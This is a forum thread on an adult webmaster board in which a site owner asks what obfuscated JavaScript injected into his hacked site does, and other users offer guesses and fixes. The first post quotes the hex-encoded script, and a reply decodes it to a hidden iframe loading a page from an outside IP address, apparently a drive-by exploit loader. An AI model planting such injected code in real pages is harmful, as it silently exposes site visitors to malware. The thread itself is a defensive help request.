![]() |
![]() |
![]() |
||||
Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums. You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today! If you have any problems with the registration process or your account login, please contact us. |
![]() ![]() |
|
Discuss what's fucking going on, and which programs are best and worst. One-time "program" announcements from "established" webmasters are allowed. |
|
Thread Tools |
![]() |
#1 |
Confirmed User
Join Date: Jan 2004
Location: The Netherlands
Posts: 335
|
One of my sites hacked, question about code
So I just found out someone managed to add some javascript/exploit to one of my sites. No idea yet how they got in, site is running on smartthumbs/atx, all other sites on the server are fine.
Anyone got an idea what this code is doing : <script> var s='3C696672616D65207372633D22687474703A2F2F3139352 E352E3131362E3235302F65782F7374617469632E706870222 077696474683D32206865696768743D32207374796C653D226 46973706C61793A6E6F6E65223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} document.write(unescape(o)); </script> |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#2 |
So Fucking Banned
Join Date: Jan 2007
Posts: 103
|
nothing to worry about, ur just paranoid
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#3 |
Confirmed User
Join Date: Jan 2004
Location: The Netherlands
Posts: 335
|
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#4 |
Confirmed IT Professional
Industry Role:
Join Date: Nov 2005
Location: Hollywood, CA
Posts: 3,744
|
Let me throw a wild guess into the wind. Hosting at webair?? LOL
__________________
The Best Affiliate Software, Ever. |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#5 |
Confirmed User
Join Date: Jan 2004
Location: The Netherlands
Posts: 335
|
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#6 | |
Confirmed IT Professional
Industry Role:
Join Date: Nov 2005
Location: Hollywood, CA
Posts: 3,744
|
Quote:
![]()
__________________
The Best Affiliate Software, Ever. |
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#7 | |
Confirmed User
Join Date: Jan 2004
Location: The Netherlands
Posts: 335
|
Quote:
|
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#8 |
Confirmed User
Join Date: Jan 2006
Location: Ouagadougou , Burkina Faso
Posts: 112
|
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#9 |
Affiliate
Join Date: Jul 2004
Posts: 28,735
|
time to change your ftp login!
__________________
M&A Queen |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#10 |
Confirmed User
Join Date: Jan 2004
Location: The Netherlands
Posts: 335
|
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#11 |
Confirmed User
Industry Role:
Join Date: Dec 2002
Location: in your head
Posts: 3,625
|
since i keep my templates in comus and st set to 644 or 444 permissions i havent had any iframes added to my pages anymore.
__________________
icq:148573096 skype:dabone2 email:boneless(a)mgpteam(.)com |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#12 |
Confirmed User
Join Date: Oct 2005
Location: Charlotte, NC
Posts: 908
|
The code writes this to your web pages:
<iframe src="http://195.5.116.250/ex/static.php" width=2 height=2 style="display:none"></iframe>
__________________
ICQ: 284903372 |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#13 |
Confirmed User
Join Date: Mar 2004
Location: → → →
Posts: 1,717
|
Did you upgrade your ATX recently? They had a security update last week I believe.
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#14 |
Confirmed User
Join Date: Aug 2006
Posts: 387
|
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#15 |
Confirmed User
Join Date: Jan 2004
Location: The Netherlands
Posts: 335
|
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#16 | |
Confirmed User
Join Date: Jan 2004
Location: The Netherlands
Posts: 335
|
Quote:
Hmmm......... seems I'm not the only one, chmodded my smart thumbs templates to 444 and until now I'm fine again |
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#17 |
Confirmed User
Join Date: Apr 2006
Location: Pornyland
Posts: 789
|
get another host, not going to promote mine here, but do yourself a favor and get out of that webair oversold crap
__________________
<sig spot goes here> |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#18 |
Confirmed User
Join Date: Jan 2004
Location: The Netherlands
Posts: 335
|
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#19 |
So Fucking Banned
Join Date: Sep 2007
Posts: 254
|
bummpppppp
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#20 |
Confirmed User
Join Date: Nov 2003
Posts: 876
|
this happened to one of my SSH accounts last week
TURN THAT SHIT OFF UNLESS YOU NEED IT the script interprets out to an invisible iframe... go figure =/ again, secure your sites by turning off ssh and contact your host to see anymore information that can dig up for you and to protect it from happening in the future.
__________________
//porn-oh network |
![]() |
![]() ![]() ![]() ![]() ![]() |